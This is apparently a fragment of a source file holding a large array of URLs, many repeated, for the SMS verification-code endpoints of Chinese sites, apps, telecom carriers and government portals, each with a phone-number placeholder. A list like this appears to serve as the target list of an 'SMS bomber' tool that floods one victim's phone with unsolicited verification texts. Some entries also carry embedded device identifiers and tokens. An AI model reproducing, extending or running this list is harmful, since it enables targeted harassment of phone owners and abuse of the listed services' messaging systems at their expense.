"https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://m.zhaopin.com/api/capi?capiUrl=passport/getSmsCodeSecurity&mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.gangaimall.com:80/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]&type=register&_=1582428078447", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", + "http://app.zhigoukeji.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.cshixi.com/api/sendCode?username=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://ccyagu.gswanzhong.com:80/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.ydhz.xyz/index.php?hm=[phone]", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://wwww.0cskj.top/api.php?act=user&key=L747V6vp26fVFuvp0&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "https://api.julym.com/hz/api.html?number=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://m.tk.cn:80/tkmobile/orderSentSmsServlet?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + 